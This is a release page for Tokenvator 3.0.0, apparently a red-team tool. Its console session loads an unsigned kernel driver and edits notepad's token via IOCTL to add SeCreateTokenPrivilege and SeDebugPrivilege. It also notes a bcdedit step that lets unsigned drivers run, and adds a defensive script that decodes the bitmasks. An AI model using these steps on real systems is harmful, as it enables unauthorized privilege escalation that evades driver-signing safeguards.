3.0.0
Release date: 2021-07-23 00:25:48
Latest release of 0xbadjuju/Tokenvator: 3.0.1 (2021-08-25 03:50:28)
See the NetSPI blog for full details: https://www.netspi.com/blog/technical/network-penetration-testing/tokenvator-release-3/
(Tokens) > Install_Driver /ServiceName:TokenDriver /Path:C:\Share\KernelTokens.sys
Option Value
------ -----
servicename TokenDriver
path C:\Share\KernelTokens.sys
[*] Service Name: TokenDriver
[*] Service Path: C:\Share\KernelTokens.sys
[*] Using Service Name TokenDriver
[*] Connecting to .
[+] Connected to .
[*] Full Path: C:\Share\KernelTokens.sys
[+] Opened service
[+] Started Service
(Tokens) > Add_Privilege /Process:notepad /Privilege:SeCreateTokenPrivilegee
Option Value
------ -----
process notepad
privilege SeCreateTokenPrivilege
[+] 8568 notepad
[+] Connected to Driver
[*] Sending IOCTL 2285592
[+] 72 Bytes Returned
[+] PEPROCESS Base Address : 0xFFFFBC0F8A59F080
[+] EX_FAST_REF Base Address : 0xFFFFBC0F8A59F538
[+] EX_FAST_REF Data : 0xFFFF95027C1ED063
[+] TOKEN Base Address : 0xFFFF95027C1ED060
[+] PSEP_TOKEN_PRIVILEGES Base Address : 0xFFFF95027C1ED0A0
[+] Current Present Value : 0x602880000
[+] Updated Present Value : 0x602880004
[+] Enabled : 0x800000
[+] EnabledByDefault : 0x40800000
[*] Disconnected from Driver
(Tokens) > List_Privileges /Process:Notepad
Option Value
------ -----
process Notepad
[+] 8568 Notepad
Remote: True
Impers: False
[*] Recieved Process Handle 0x02C4
[*] Recieved Token Handle 0x02C8
[*] Enumerating Token Privileges
[*] GetTokenInformation (TokenPrivileges) - Pass 1
[*] GetTokenInformation - Pass 2
[+] Enumerated 6 Privileges
Privilege Name Enabled
-------------- -------
SeCreateTokenPrivilege False
SeShutdownPrivilege False
SeChangeNotifyPrivilege True
SeUndockPrivilege False
SeIncreaseWorkingSetPrivilege False
SeTimeZonePrivilege False
(Tokens) > Add_Privilege /Process:notepad /Privilege:SeDebugPrivilege lege
Option Value
------ -----
process notepad
privilege SeDebugPrivilege
[+] 8568 notepad
[+] Connected to Driver
[*] Sending IOCTL 2285592
[+] 72 Bytes Returned
[+] PEPROCESS Base Address : 0xFFFFBC0F8A59F080
[+] EX_FAST_REF Base Address : 0xFFFFBC0F8A59F538
[+] EX_FAST_REF Data : 0xFFFF95027C1ED062
[+] TOKEN Base Address : 0xFFFF95027C1ED060
[+] PSEP_TOKEN_PRIVILEGES Base Address : 0xFFFF95027C1ED0A0
[+] Current Present Value : 0x602880004
[+] Updated Present Value : 0x602980004
[+] Enabled : 0x800000
[+] EnabledByDefault : 0x40800000
[*] Disconnected from Driver
(Tokens) > List_Privileges /Process:Notepad
Option Value
------ -----
process Notepad
[+] 8568 Notepad
Remote: True
Impers: False
[*] Recieved Process Handle 0x02C8
[*] Recieved Token Handle 0x02CC
[*] Enumerating Token Privileges
[*] GetTokenInformation (TokenPrivileges) - Pass 1
[*] GetTokenInformation - Pass 2
[+] Enumerated 7 Privileges
Privilege Name Enabled
-------------- -------
SeCreateTokenPrivilege False
SeShutdownPrivilege False
SeDebugPrivilege False
SeChangeNotifyPrivilege True
SeUndockPrivilege False
SeIncreaseWorkingSetPrivilege False
SeTimeZonePrivilege False
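For reading the session above from a forensic or detection standpoint, the following added example (not part of Tokenvator or the original release notes) decodes the `Present`, `Enabled` and `EnabledByDefault` bitmasks printed by `Add_Privilege` and reports which privilege each call introduced. It assumes the standard Windows privilege numbering, where bit n of each mask corresponds to the privilege with LUID value n; the mask values are copied from the transcript.

```python
# Added example: decode the SEP_TOKEN_PRIVILEGES bitmasks shown in the transcript.
# Assumption (not from the page): bit n maps to the privilege with LUID n,
# using the standard Windows numbering that starts at SeCreateTokenPrivilege = 2.
_NAMES = """CreateToken AssignPrimaryToken LockMemory IncreaseQuota MachineAccount Tcb
Security TakeOwnership LoadDriver SystemProfile Systemtime ProfileSingleProcess
IncreaseBasePriority CreatePagefile CreatePermanent Backup Restore Shutdown Debug
Audit SystemEnvironment ChangeNotify RemoteShutdown Undock SyncAgent EnableDelegation
ManageVolume Impersonate CreateGlobal TrustedCredManAccess Relabel IncreaseWorkingSet
TimeZone CreateSymbolicLink DelegateSessionUserImpersonate""".split()
PRIVILEGE_BITS = {i + 2: f"Se{n}Privilege" for i, n in enumerate(_NAMES)}

def decode(mask):
    """Return the privilege name for every set bit, lowest bit first."""
    names, bit = [], 0
    while mask >> bit:
        if (mask >> bit) & 1:
            names.append(PRIVILEGE_BITS.get(bit, f"Unknown({bit})"))
        bit += 1
    return names

def added(before, after):
    """Privileges whose bit is set in `after` but not in `before`."""
    return decode(after & ~before)

def removed(before, after):
    """Privileges whose bit is set in `before` but not in `after`."""
    return decode(before & ~after)

# (label, Current Present Value, Updated Present Value) from the transcript
SNAPSHOTS = [
    ("Add_Privilege SeCreateTokenPrivilege", 0x602880000, 0x602880004),
    ("Add_Privilege SeDebugPrivilege", 0x602880004, 0x602980004),
]
ENABLED = 0x800000              # "Enabled" line in the transcript
ENABLED_BY_DEFAULT = 0x40800000  # "EnabledByDefault" line in the transcript

def report():
    """Build a per-call diff plus a summary of the final token state."""
    lines = []
    for label, before, after in SNAPSHOTS:
        lines.append(f"{label}: added={added(before, after)} "
                     f"removed={removed(before, after)}")
    final = SNAPSHOTS[-1][2]
    lines.append(f"Present: {decode(final)}")
    lines.append(f"Enabled: {decode(ENABLED)}")
    lines.append(f"Present but not Enabled: {decode(final & ~ENABLED)}")
    lines.append(f"EnabledByDefault but not Present: {decode(ENABLED_BY_DEFAULT & ~final)}")
    return lines

if __name__ == "__main__":
    print("\n".join(report()))
```

The decoded final `Present` mask matches the seven privileges that `List_Privileges` enumerates, and the unchanged `Enabled` mask matches the two added privileges being listed as `False`.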
Note: The KernelTokens.sys driver is compiled and attached, but it is not signed.
If you want to test it without signing it, run the command bcdedit /debug on
and restart.
Note: This release is for .NET 4.5 x64.
1. KernelTokens.sys 12.14KB
2. Tokenvator.exe 172KB